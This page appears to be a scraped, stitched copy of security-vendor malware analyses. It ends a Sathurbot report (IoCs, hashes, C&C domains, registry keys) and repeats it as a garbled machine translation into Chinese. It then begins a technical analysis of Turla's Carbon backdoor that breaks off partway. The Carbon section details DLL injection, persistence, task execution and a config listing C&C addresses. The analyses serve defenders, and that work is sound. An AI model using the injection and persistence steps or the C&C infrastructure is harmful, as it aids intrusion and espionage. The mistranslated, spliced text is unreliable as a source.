Web Admins – Should the normal functioning of the website not require the XML-RPC API, you are advised to disable it and use complex passwords.

Users – Avoid both running executables downloaded from sources other than those of respected developers, and downloading files from sites not designed primarily as file-sharing sites.

IoCs

Currently, we have observed Sathurbot installing to:

\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll

\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll

\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

\Users\*****\AppData\Local\Microsoft\Protect\protecthost.dll

Runs in the context of rundll32.exe or explorer.exe process and locks files and registry keys from editing. It is present in both x32 and x64 bit versions in the installer.

Subfolders to the above (contain the seeded files by torrent)
\SecurityCache\cache\resume\
\SecurityCache\cache\rules\
\SecurityCache\data\
\SecurityCache\zepplauncher.mif – contains the DHT nodes
\temp\

%appdata%\SYSHashTable\ – contains folders representing the hashes of visited domains
%appdata%\SYSHashTable\SyshashInfo.db – collection of interesting domains found incl. framework info

Samples (SHA-1)

Installers:
2D9AFB96EAFBCFCDD8E1CAFF492BFCF0488E6B8C
3D08D416284E9C9C4FF36F474C9D46F3601652D5
512789C90D76785C061A88A0B92F5F5778E80BAA
735C8A382400C985B85D27C67369EF4E7ED30135
798755794D124D00EAB65653442957614400D71D
4F52A4A5BA897F055393174B3DFCA1D022416B88
8EDFE9667ECFE469BF88A5A5EBBB9A75334A48B9
5B45731C6BBA7359770D99124183E8D80548B64F
C0F8C75110123BEE7DB5CA3503C3F5A50A1A055E
C8A514B0309BCDE73F7E28EB72EB6CB3ABE24FDD
AF1AE760F055120CA658D20A21E4B14244BC047D
A1C515B965FB0DED176A0F38C811E6423D9FFD86
B9067085701B206D2AC180E82D5BC68EDD584A8B
77625ADEA198F6756E5D7C613811A5864E9874EA
Sathurbot dll:
F3A265D4209F3E7E6013CA4524E02D19AAC951D9
0EA717E23D70040011BD8BD0BF1FFAAF071DA22C
2381686708174BC5DE2F04704491B331EE9D630B
2B942C57CEE7E2E984EE10F4173F472DB6C15256
2F4FAA5CB5703004CA68865D8D5DACBA35402DE4
4EBC55FDFB4A1DD22E7D329E6EF8C7F27E650B34
0EF3ECD8597CE799715233C8BA52D677E98ABDFD
0307BBAC69C54488C124235449675A0F4B0CCEFA
149518FB8DE56A34B1CA2D66731126CF197958C3
3809C52343A8F3A3597898C9106BA72DB7F6A3CB
4A69B1B1191C9E4BC465F72D76FE45C77A5CB4B0
5CCDB41A34ADA906635CE2EE1AB4615A1AFCB2F2
6C03F7A9F826BB3A75C3946E3EF75BFC19E14683
8DA0DC48AFB8D2D1E9F485029D1800173774C837
AC7D8140A8527B8F7EE6788C128AFF4CA92E82C2
E1286F8AE85EB8BD1B6BE4684E3C9E4B88D300DB

Additional payloads:

C439FC24CAFA3C8008FC01B6F4C39F6010CE32B6
ABA9578AB2588758AD34C3955C06CD2765BFDF68
DFB48B12823E23C52DAE03EE4F7B9B5C9E9FDF92
FAFF56D95F06FE4DA8ED433985FA2E91B94EE9AD
B728EB975CF7FDD484FCBCFFE1D75E4F668F842F
59189ABE0C6C73B66944795A2EF5A2884715772E
C6BDB2DC6A48136E208279587EFA6A9DD70A3FAA
BEAA3159DBE46172FC79E8732C00F286B120E720
5ED0DF92174B62002E6203801A58FE665EF17B76
70DFABA5F98B5EBC471896B792BBEF4DB4B07C53
10F92B962D76E938C154DC7CBD7DEFE97498AB1E
426F9542D0DDA1C0FF8D2F4CB0D74A1594967636
AA2176834BA49B6A9901013645C84C64478AA931
1C274E18A8CAD814E0094C63405D461E815D736A
61384C0F690036E808F5988B5F06FD2D07A87454
F32D42EF1E5ED221D478CFAA1A76BB2E9E93A0C1
594E098E9787EB8B7C13243D0EDF6812F34D0FBA
1AAFEBAA11424B65ED48C68CDEED88F34136B8DC
BA4F20D1C821B81BC324416324BA7605953D0605
E08C36B122C5E8E561A4DE733EBB8F6AE3172BF0
7748115AF04F9FD477041CB40B4C5048464CE43E
3065C1098B5C3FC15C783CDDE38A14DFA2E005E4
FA25E212F77A06C0B7A62C6B7C86643660B24DDA
FADADFFA8F5351794BC5DCABE301157A4A2EBBCF
B0692A03D79CD2EA7622D3A784A1711ADAABEE8D
9411991DCF1B4ED9002D9381083DE714866AEA00

Associated domains

DNS:
zeusgreekmaster.xyz
apollogreekmaster.xyz

C&C:
jhkabmasdjm2asdu7gjaysgddasd.xyz
boomboomboomway.xyz
mrslavelemmiwinkstwo.xyz
uromatalieslave.space
newforceddomainisherenow.club
justanotherforcedomain.xyz
artemisoslave.xyz
asxdq2saxadsdawdq2sasaddfsdfsf4ssfuckk.xyz
kjaskdhkaudhsnkq3uhaksjndkud3asds.xyz
badaboommail.xyz

Torrent trackers:
badaboomsharetracker.xyz
webdatasourcetraffic.xyz
sharetorrentsonlinetracker.xyz
webtrafficsuccess.xyz

Registry values

You may need to use a third-party tool, as Windows Regedit might not even show these:

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\explorer.exe|Name=Windows Explorer|”

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\system32\\rundll32.exe|Name=Windows host process (Rundll32)|”

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0TheftProtectionDll = {GUID1}
HKLM\SOFTWARE\Classes\CLSID\{GUID1} = “Windows Theft Protection”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32 = “C:\\ProgramData\\Microsoft\\Performance\\TheftProtection\\TheftProtection.dll”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32\ThreadingModel = “Apartment”

HKLM\SOFTWARE\Classes\CLSID\{GUID2}

The {GUID2} entries are variable across samples and have 6 char long subkeys, content is binary type and encrypted – used to store variables, temporary values and settings, IP’s, C&C’s, UID

e.g. {GUID2} entries look like

HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000003
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000009
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000011
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000008
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000007
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000004
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000010
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00020001

BENWEN揭示了当前生态系统sathurbot后门木马,特别是在其使用的种子作为输送介质及其分布式蛮弱的WordPress的管理员帐户的强迫。HACKERSCHINA

torrent下载者

想不付钱就下载一部电影或软件?可能会有相关的风险。它很可能会发生,你最喜欢的搜索引擎返回到正常无关的文件共享网站Torrent链接。他们可以,但是,运行WordPress和已经被攻破。

一些搜索结果的例子:

点击那些链接返回以下页面(注意,有的甚至使用HTTPS):

这部电影的子页面都导致相同的torrent文件;而所有软件的子页面导致另一个torrent文件。当你开始在你的喜爱torrenting BT客户端,你会发现文件是好种子,从而出现合法。如果你下载电影的洪流,其内容将与视频延长伴有明显的编解码器包的安装程序文件,并解释文本文件。该软件包含了一个明显的安装程序可执行文件和洪流的一个小的文本文件。两者的目的都是让让受害者运行可执行文件加载DLL的sathurbot。

在你开始执行,你会有这样的消息:

当你思考你的选择,不好的事情开始发生在背景。你刚刚成为BOTsathurbot网络

后门和下载

在启动时,sathurbot检索与C的一个查询的DNS。该反应是一个DNS的TXT等记录。它的字符串值解密作为C & C状态报告域名,任务检索到其他恶意软件下载链接。

sathurbot可以自我更新和下载和启动其他可执行文件。我们已经看到的变化boaxxeKovterfleercivet,但这不一定是一个详尽的列表。

的sathurbot然后报告其成功安装在一个监听端口的C&C的定期报告到C和C,它是活得很好,等待额外的任务。

网络爬虫

sathurbot附带一些5000再加上基本的通用词。这些都是随机组合形成2-4字词组合作为通过谷歌查询字符串,Bing搜索引擎Yandex。

从网页在每一个这样的搜索结果网址,随机2-4词长文本块选择(这次可能是更有意义的因为它是从真实文本)和用于搜索查询下一轮。

最后,搜索结果的第二集(第三页)收获的域名。

提取的域名都是随后探讨由WordPress框架创建。这里的诀窍是检查响应的URLhttp://〔〕/wp-login.php _名字域

随后该域的根目录页取了其他框架的存在。换句话说,他们也感兴趣:Drupal、Joomla,php-nuke,phpfox,和dedecms。

在启动时,或在一定的时间间隔,收获的域发送到C和C(一个不同的域是用比借壳–硬编码的一个)。

分布式的WordPress的密码攻击

客户现在可以得到一个列表域访问凭据(格式为登录名:密码@域)探讨密码。在Sathurbot的僵尸网络不同的机器人尝试不同的登录凭据相同的网站。每个机器人只尝试每网站和移动单点登录。这种设计有助于确保BOT没有IP地址被列入黑名单的任何目标网站,可以重温它的未来。

在我们的测试中,探讨10000项列表是由C和C返回

对于攻击本身的XML-RPC APIWordPress是使用。特别是wp.getusersblogsAPI的滥用。一个典型的请求看起来像:

探索一个数域凭据如下图所示的序列:

响应进行评估和结果发布到C和C

洪流客户端,播种机

BOT具有libtorrent图书馆集成和任务之一是成为一个播种机–二进制文件下载、创建和种子的种子。

BitTorrent的引导

完成周期从吸血一个非自愿的播种机

注:在网络不是每个BOT是执行所有的功能,有些只是网络爬虫,有的只是攻击XML-RPC API,有的做。而且,并不是每一个BOT似乎是播种的洪流。

影响

上述的尝试wp-login.php /从众多的用户,甚至网站不主机WordPress的,是sathurbot的直接影响。许多网站管理员观察和想知道为什么会发生。此外,WordPress网站可以看到潜在的攻击wp.getusersblogs在他们的日志

通过检查日志,系统构件和文件,僵尸网络由超过20000受感染的计算机,至少从六月2016活跃。

偶尔,我们看到Torrent链接通过电子邮件发送以及。

检测

网络管理员–检查服务器上的未知的子页面和/或目录。如果他们有任何引用洪流下载提供,检查和可能的后门攻击日志。

用户–运行Wireshark的滤波器http.request没有浏览器打开看到太多的要求,喜欢wp-login.php /和/或邮政/ xmlrpc.php。另外,检查文件或注册表项在国际奥委会部分上市,下面。

ESET用户免受这一威胁的多层次。

搬家公司

网络管理员–修改密码,删除不属于网站的子页面,随意擦拭,从备份中恢复的网站。

用户–使用第三方的文件管理器找到嫌犯。DLL(注意,文件和目录都有隐藏属性设置),打开进程管理器、任务管理器,杀死explorer.exe和/或rundll32.exe,删除(检疫)的影响。DLL,启动。

注意:这将删除sathurbot而已,并没有任何其他恶意软件可能还下载了。

另外,考虑全面的反恶意软件产品,或者至少是一个在线扫描

预防

网络管理员–应该正常运作的网站不需要XML-RPC API,建议您禁用它并使用复杂的密码。

用户–避免运行的可执行文件从其他来源比尊重开发者下载,并不是设计作为主要的文件共享网站的站点下载文件。

IOC

目前,我们已经观察到sathurbot安装:

programdata \ Microsoft \ \ \ \ performancemonitor.dll性能监视器

\下\微软\ \ \ theftprotection.dll theftprotection性能

\下\微软\ \ \ securityhelper.dll性能监控

\用户\ ***** \ AppData \地方\微软\保护\ protecthost.dll

运行中rundll32.exe或Explorer.exe进程锁和编辑文件和注册表键。它是在安装x32和x64位版本目前。

子文件夹,以上(含种子文件的洪流)
securitycache \ \ \ \缓存摘要
\ \ \ \ securitycache缓存规则
securitycache日期\ \ \
“securitycache \ zepplauncher.mif–包含DHT节点
\温度\

syshashtable %APPDATA%directory \ \–包含表示哈希文件夹访问域
syshashtable %APPDATA%directory \ \ syshashinfo.db–收集有趣的领域,包括框架的信息

Carbon Paper: Peering into Turla’s second stage backdoor窥视Turla的第二阶段的后门

The Turla espionage group has been targeting various institutions for many years. Recently, we found several new versions of Carbon, a second stage backdoor in the Turla group arsenal. Last year, a technical analysis of this component was made by Swiss GovCERT.ch as part of their report detailing the attack that a defense firm owned by the Swiss government, RUAG, suffered in the past.

This blog post highlights the technical innovations that we found in the latest versions of Carbon we have discovered.

Looking at the different versions numbers of Carbon we have, it is clear that it is still under active development. Through the internal versions embedded in the code, we see the new versions are pushed out regularly. The group is also known to change its tools once they are exposed. As such, we have seen that between two major versions, mutexes and file names are being changed.

Infection vectors

The Turla group is known to be painstaking and work in stages, first doing reconnaissance on their victims’ systems before deploying their most sophisticated tools such as Carbon.

A classic Carbon compromise chain starts with a user receiving a spearphishing email or visiting a previously compromised website, typically one that the user visits regularly — a technique known as a watering hole attack.

After a successful attack, a first stage backdoor — such as Tavdig[1]or Skipper[2]— is installed on the user machine. Once the reconnaissance phase is over, a second stage backdoor, like Carbon, is installed on key systems.

Technical analysis

Carbon is a sophisticated backdoor used to steal sensitive information from targets of interest by the Turla group.

This malware shares some similarities with “Uroburos”[3], a rootkit used by the same group. The most relevant resemblance is the communication framework. Indeed, both of them provide communication channels between different malware components. The communication objects are implemented in the same way, the structures and vtables look identical except that there are fewer communication channels provided in Carbon. Indeed, Carbon might be a “lite” version of Uroburos (without kernel components and without exploits).

For Turla group to decide to install Carbon on a system, a (stage 1) recognition tool is usually delivered first to the target: this tool collects several pieces of information about the victim’s machine and its network (through Tavdig or Skipper for example). If the target is considered interesting enough, it will receive more sophisticated malware (such as Carbon or Uroburos).

Global architecture

The Carbon framework consists of:

  • a dropper that installs the carbon components and its configuration file
  • a component that communicates with the C&C
  • an orchestrator that handles the tasks, dispatches them to other computers on the network and injects into a legitimate process the DLL that communicates with the C&C
  • a loader that executes the orchestrator

Carbon Dating

The orchestrator and the injected library have their own development branch.

Thanks to the compilation dates and the internal versions numbers hardcoded in the PE files, we might have the following timeline:

Table 1 – Carbon development timeline

Carbon files

The files from the Carbon framework can have different names depending on the version but they all keep the same internal name (from the metadata) regardless of the version:

  • the dropper: “SERVICE.EXE”
  • the loader: “SERVICE.DLL” or “KmSvc.DLL”
  • the orchestrator: “MSIMGHLP.DLL”
  • the injected library: “MSXIML.DLL”

Each of these files exist in 32bit and in 64bit versions.

Working directory

Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware’s behavior. The contents of the majority of these files are encrypted with the CAST-128 algorithm[4].

A base working directory will contain the files/folders related to Carbon. This directory is chosen randomly among the folders in %ProgramFiles% but excluding “WindowsApps”.

The filenames are hardcoded in the orchestrator. The same names are used in the 3.7x+ branch. Because the injected library accesses the same files as the orchestrator, it is another easy way to link a library version and an orchestrator.

Carbon 3.7x files tree view:
\%carbon_working_folder\%   // base folder├── 0208 // tasks results and logs files│   ├── C_56743.NLS // contains list of files to send to the C&C server, this file is neither compressed nor encrypted├── asmcerts.rs├── getcerts.rs├── miniport.dat  // configuration file├── msximl.dll    // injected library (x32)├── Nls // contains tasks (commands to be executed or PE file) and their configuration files│   ├── a67ncodc.ax  // tasks to be executed by the orchestrator│   ├── b9s3coff.ax  // tasks to be executed by the injected library├── System   // plugins folder│   ├── bootmisc.sdi // not used├── qavscr.dat    // error log├── vndkrmn.dic   // log└── ximarsh.dll   // injected library (x64)

Since version 3.80, all filenames have changed.

Carbon 3.8x files tree view:
\carbon_working_folder\%   // base folder├── 0409  // contains tasks (commands to be executed or PE file) and their configuration files│   ├── cifrado.xml    // tasks to be executed by the injected library│   ├── encodebase.inf // tasks to be executed by the orchestrator├── 1033 // tasks results and logs files│   ├── dsntype.gif // contains list of files to send to the C&C server, this file is neither compressed nor encrypted├── en-US  // plugins folder│   ├── asmlang.jpg // not used├── fsbootfail.dat  // error log├── mkfieldsec.dll  // injected library (x32)├── preinsta.jpg    // log├── wkstrend.xml    // configuration file├── xmlrts.png└── zcerterror.png

File access

In the case of the majority of the files from the Carbon working folder, when one is accessed by the malware, the following steps are taken:

  • a specific mutex is used to ensure its exclusive access.
  • the file is decrypted (CAST-128)
  • when the operations on the file are done, the file is reencrypted (CAST-128)
  • the mutex is released

Mutexes

The following mutexes are created by the orchestrator in Carbon 3.7x:

  • “Global\\MSCTF.Shared.MUTEX.ZRX” (used to ensure exclusive access to “vndkrmn.dic”)
  • “Global\\DBWindowsBase” (used to ensure exclusive access to “C_56743.NLS”)
  • “Global\\IEFrame.LockDefaultBrowser” (used to ensure exclusive access to “b9s3coss.ax”)
  • “Global\\WinSta0_DesktopSessionMut” (used to ensure exclusive access to “a67ncodc.ax”)
  • “Global\{5FA3BC02-920F-D42A-68BC-04F2A75BE158}” (used to ensure exclusive access to new files created in “Nls” folder)
  • “Global\\SENS.LockStarterCacheResource” (used to ensure exclusive access to “miniport.dat”)
  • “Global\\ShimSharedMemoryLock” (used to ensure exclusive access to “asmcerts.rs”)

In carbon 3.8x, the filenames and the mutex names have changed:

  • “Global\\Stack.Trace.Multi.TOS” (used to ensure exclusive access to “preinsta.jpg”)
  • “Global\\TrackFirleSystemIntegrity” (used to ensure exclusive access to “dsntype.gif”)
  • “Global\\BitswapNormalOps” (used to ensure exclusive access to “cifrado.xml”)
  • “Global\\VB_crypto_library_backend” (used to ensure exclusive access to “encodebase.inf”)
  • “Global\{E41B9AF4-B4E1-063B-7352-4AB6E8F355C7}” (used to ensure exclusive access to new files created in “0409” folder)
  • “Global\\Exchange.Properties.B” (used to ensure exclusive access to “wkstrend.xml”)
  • “Global\\DatabaseTransSecurityLock” (used to ensure exclusive access to “xmlrts.png”)

These mutexes are also used in the injected dll to ensure that the orchestrator has been executed.

Configuration File

The configuration file affects the malware’s behavior. The file format is similar to “inf” files used by Windows. It contains among others:

  • an “object_id” that is a unique uuid used to identify the victim, when the value is not set in the file, it is generated randomly by the malware
  • a list of processes into which code is injected (iproc)
  • the frequency and time for task execution / backup logs / connection to the C&C ([TIME])
  • the IP addresses of other computers on the network ([CW_LOCAL])
  • the C&C server addresses ([CW_INET])
  • the named pipes used to communicate with the injected library and with the other computers ([TRANSPORT])

This file might be updated later. Indeed, in the communication library, some cryptographic keys are used to encrypt/decrypt data and these keys are retrieved from a section [CRYPTO] in the configuration file that does not exist when the file is dropped from the loader resources.

Carbon 3.77 configuration file:
[NAME]object_id=iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exeex = #,netscape.exe,mozilla.exe,adobeupdater.exe,chrome.exe[TIME]user_winmin = 1800000user_winmax = 3600000sys_winmin = 3600000sys_winmax = 3700000task_min = 20000task_max = 30000checkmin = 60000checkmax = 70000logmin =  60000logmax = 120000lastconnect=111timestop=active_con = 900000time2task=3600000[CW_LOCAL]quantity = 0[CW_INET]quantity = 3address1 = doctorshand.org:80:/wp-content/about/address2 = www.lasac.eu:80:/credit_payment/url/address3 = www.shoppingexpert.it:80:/wp-content/gallery/[TRANSPORT]system_pipe = comnapspstatus = yesadaptable = no[DHCP]server = 135[LOG]logperiod = 7200[WORKDATA]run_task=run_task_system=

Logfile

The Carbon framework includes a logfile that is used to log actions performed by the malware and information on the system that can be useful to the malware operator (for example if an analysis tool such as WireShark is running on the machine).

The log’s format has not changed since Carbon 3.71:

  • Date|Time|Object-Id|Source|Message
example
[LOG]start=120/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|OPER|New object ID generated '8hTdJtUBB57ieReZAOSgUYacts'|20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|ST|3/81|0|20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|START OK

This file is periodically backed up and sent to the C&C.

Dropper

The dropper is the only executable that is not a DLL. It is the first PE file to be executed: it is used to extract the other components from its resources.

The PE files that are used to load the main components are extracted into the Windows system directory while the orchestrator, the library used to communicate with the C&C and the configuration file are extracted into the Carbon working directory.

A new section is appended into a random “.inf” file from %SystemRoot%\INF. The section’s name is the volume serial disk number of the compromised machine and a value “root” is created with the chosen Carbon working directory.

Example:
[5049654F]root="C:\Program Files\Windows Portable Devices"

Loader

This part of the component is used to load the orchestrator.

A service that ensures Carbon’s persistency is created. Its name can either be “srservice”, “ipvpn” or “hkmsvc” depending of the operating system version running on the compromised machine.

The Carbon working directory is retrieved by walking through the “%windir%\inf” folder and looking for the file that contains the Carbon base path.

Last but not least, the function “ModuleStart” (in Carbon 3.71) or “ModStart” (since Carbon 3.77) from the orchestrator (located in the Carbon base folder) is called.

Orchestrator

The orchestrator is the main component of the Carbon framework. It is mainly used to inject code into a process that communicates legitimately over the Internet and to dispatch the tasks received from the injected library to other computers on the same network either through named pipes or TCP.

Seven threads are created by the malware. It is easy to identify Carbon’s characteristics because each thread has a specific role:

Configuration fetching

Because the configuration file can be updated by the malware, some attributes like the C&C server addresses are monitored every 10 minutes.

Check Carbon storage folder periodically

There is a storage folder located in the Carbon working directory. This folder contains some files downloaded from the C&C server (tasks that are either commands to be executed or PE files, and their configuration files).

This thread will run continuously and check every two hours[5]whether there is still enough space available in this folder; if not, a notification is written into the logfile.

Task execution

The execution of the tasks in the context of the orchestrator process is very similar to the way in which it is performed in the communication library (cf Communication library / Tasks execution).

Unlike the communication library, it is the file “encodebase.inf” (for Carbon v3.8x) or “a67ncode.ax” that contains the list of the tasks to execute.

Each line of this file is composed in the following way:

  • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | [execution_mode | username | password]

The five first fields are required, while the last three are optional. If the field “execution_mode” exists, its value will affect the way the task is executed:

  • 0 or 1: normal execution
  • 2: the task is executed in the security context of a specific user (credentials are provided through the username/password fields)
  • 3 or 4: the task is executed in the security context of the user represented by the “explorer.exe” token

P2P

Like Uroburos/Snake, Carbon can dispatch tasks to other computers from the same network via named pipe or TCP. It is useful to be able to dispatch and execute tasks on computers that do not have Internet access.

Communication channels

Uroburos used several types of communication transports than can be categorized as follows:

  • type 1: TCP
  • type 2: enc, np, reliable, frag, m2b, m2d
  • type 3: t2m
  • type 4: UDP, doms, domc

Carbon uses a reduced number of communication channels:

  • type 1: TCP, b2m
  • type 2: np, frag, m2b

The data sent to peers are usually fragmented and transported either by TCP or via a named pipe. If, for example, fragmented data are sent from a computer to another one by a named pipe, an object “frag.np” is set up. In this case the mother class “frag” constructor will be called followed by a call to the constructor subclass “np”.

There is a structure composed of several handlers for each objects: initialize communication, connection (to a pipe / IP address), read data, send data etc.

How a task is forwarded to another computer

Several steps are performed to send data from one computer to another:

  • a communication channel is created (frag.np or frag.tcp object) with a specific named pipe / ip address
  • options are given to the object communication (for example : the fragment’s size, information about the peer etc.)
  • connection to the peer
  • an authentication step is performed between the host and the peer:
    • there is a handshake process where the host is sending the “magic” value “A110EAD1EAF5FA11” and expects to receive “C001DA42DEAD2DA4” from the peer
    • a command “WHO” is sent to the peer where the host sends the victim uuid and expects to receive the same uuid
  • if the authentication was successful, the data are sent to the peer

All the communication between the host and the peer are encrypted with CAST-128

Note that this P2P feature is also implemented in the communication DLL.

Plugins

This malware supports additional plugins to extend its functionalities.

In the configuration file, there is a section named “PLUGINS”. It might not exist when the configuration file is dropped from the loader resources but this file can be updated by the malware. The section “PLUGINS” contains a line formed this way:

  • %plugin_name%=%enabled%|%mode%[:%username%:%password%]|%file_path%

%file_path% can be either the path to a PE file or to a file containing a command line to be executed. %enabled% is a string that is used to know if the plugin has to be executed. If it is the case, that string value is “enabled”.

The attribute %mode% is used to control the context in which to execute the PE file/command line. It can be either:

  • 1 = execution with current user privilege in the current process context through CreateProcess().
  • 2 = execution as the user specified in the configuration (:%username%:%password% attributes), the token of this specific user is retrieved through the LogonUserAs() function.
  • 3 = execution in the security context of the user represented by the “explorer.exe” token (the token of the process “explorer.exe” is duplicated and passed through the CreateProcessAsUser() function.
  • 4 = similar than 3 but the environment variables for the user represented by the “explorer.exe” token are retrieved and passed to the function CreateProcessAsUser()

If it is a PE file:

  • the file is loaded into the malware process memory
  • the module is parsed to check if it is a DLL
  • if the module is a DLL and exports a function “ModStart” (since Carbon 3.77) or “ModuleStart” (for older versions of Carbon), a new thread is created to execute this function.
  • if the module is not a DLL but a valid PE, it is executed from the entry point.

Injection of the communication library into remote processes

The library that is used to communicate with the C&C server is injected into remote processes. In order to know where to inject this DLL, the configuration file is parsed. The section “[NAME]” contains a field “iproc” containing a list of processes that can legitimately communicate to Internet.

Example:
[NAME]iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe

For each process on the list that is running on the system, if its parent process name is either “explorer.exe” or “ieuser.exe”, the DLL will be injected into this process.

The process injection is very classical:

  • the functions “CreateToolHelp32Snapshot / Module32FirstW / Module32NextW” are used to retrieve the base address of the module “kernel32.dll”
  • the module EAT is parsed to get the address of the function “LoadLibraryW”
  • the privilege “SeDebugPrivilege” is enabled for the current process
  • memory is allocated into the remote process and the library path is written into it
  • NtCreateThreadEx or CreateRemoteThread (if the address of the first function cannot be retrieved) is called to execute LoadLibraryW to load the DLL into the memory of the remote process *

Communication library

The following analysis is based on the version 4.x of msximl. This component may have changed in the latest versions.

Configuration fetching

Besides the code in the “Configuration fetching” thread from the orchestrator (which is similar), a field “sethttp1” is retrieved from the [TRANSPORT] section.

If this value is set, HTTP 1.1 will be used for future connections.

Tasks execution

The tasks are retrieved from the C&C server.

The tasks to be executed by the communication library are listed in the file “b9s3coff.ax” (for Carbon v3.7x) or “cifrado.xml” (for Carbon v3.8x).

Each line of this file is composed in the following way:

  • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath

The task file and its config are decrypted (CAST-128) and the task executed. There are some options that are retrieved from the Carbon configuration file: “time2task” is used to set a timeout for the task execution (1 hour by default) while “task_min” and “task_max” are used as to wait a random time between the execution of the tasks on the task list (the random time will be set between “task_min” and “task_max”). These parameters come from the section [TIME].

If the task is a valid DLL file, it is loaded in the current process memory and a new thread is created to execute its “start” export. Otherwise, this is probably a command to execute. In this case, the configuration file is parsed. Like the Carbon configuration file, the task configuration file is formed as a windows “inf” file and should contain a section [CONFIG] with the following parameters:

  • [CONFIG]
    • NAME (“cmd.exe” by default)
    • ARG
    • RESULT (“stdout” by default)
    • COMPRESSION (“yes” by default)
    • DELETE (“no” by default)

The command with its arguments is executed through CreateProcess() function and the results are stored in the %task_result_filepath% file if the RESULT option is not set to “stdout”, while error or additional info are added to the task logfile.

If the option RESULT is set to stdout:

  • the result task file is deleted and the task execution output is written to the log task file
  • the line “task_id | “1” | task_log_filepath | object_id” is added at the end of the file “C_56743.NLS” (Carbon 3.7x) or “dsntype.gif” (Carbon 3.8x)

Otherwise:

  • the task execution is outputted to the task result file and the errors / additional info to the task logfile
  • the line “task_id | “2” | task_log_filepath | task_result_filepath | object_id” is added at the end of the file “C_56743.NLS” (Carbon 3.7x) or “dsntype.gif” (Carbon 3.8x)

In both cases, the same line as written into “C_56743.NLS” is also written into the field “run_task” from the Carbon configuration file. It might be intended as a way for the malware authors to know which is the last task executed when the configuration file is sent to the C&C server (check “Configuration file backup”).

Log rotation

The logfile is backed up and sent to the C&C server periodically (by default this is done every two hours).

Like the backup of the configuration file, this action is performed only during specific times of the day.
Indeed, the log rotation will be performed only when the current local time is in the range of what is defined in the configuration file.

The fields “wh_min” and “wh_max” are retrieved from the [TIME] section of the configuration file (by default: 8 and 20). The thread will execute the code only if the current hour of the day is between %wh_min% and %wh_max%.

If there is a value for the attribute “timestop” from the [TIME] section (which looks like “wDay:wMonth:wYear:wHour:wMinute”), the thread will execute the code only after this specific datetime.

The attributes “lastsend” and “logperiod” from the [LOG] section are used to specify a delay time when to backup and send the log to the C&C server. (by default: every two hours).

A temporary file with a random name prefixed by “~D” is created in the folder “208” (for Carbon v3.7x) or “1033” (for Carbon v3.8x). The logfile content is copied into this new file. It is then compressed with Bzip2 and encrypted (CAST-128).

A new line is added at the end of the file “C_56743.NLS” (for Carbon v3.7x) or “dsntype.gif” (for Carbon v3.8x):

  • “10|1|%s|%s”
    • 1st field: an ID to identify the file as a logfile
    • 2nd field: 1 (file to be sent to the C&C server)
    • 3rd field: the temp file path
    • 4rd field: the victim uuid

Last but not least, the attribute “lastsend” is updated with the current time and the original logfile is deleted.

Communication with the C&C server

The code of this thread is used to retrieve new tasks from the C&C server, to send new files to the server (the files listed in the file “C_56743.NLS” / “dsntype.gif”) and to send the new tasks to the orchestrator.

First request

A random C&C server address is chosen from the ones in the section “CW_INET”. If the port and HTTP resource path are not specified, the default is to use port 80 and “/javascript/view.php”.

A user agent is set up in the following way:

  • the version of Internet Explorer is retrieved through the registry key: “HKLM\Software\Microsoft\Internet Explorer\Version” and is concatenated to the string “Mozilla/4.0 (compatible; MSIE %d.0; ”
    • example: “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0;”
  • concatenate the previous string with the OS major/minor version values (through GetVersionExA())
    • “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0”
  • enumerate the values key in “HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform” and concatenate each value to the previous string and then append a closing paren.
    • example: “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0; SLCC2)

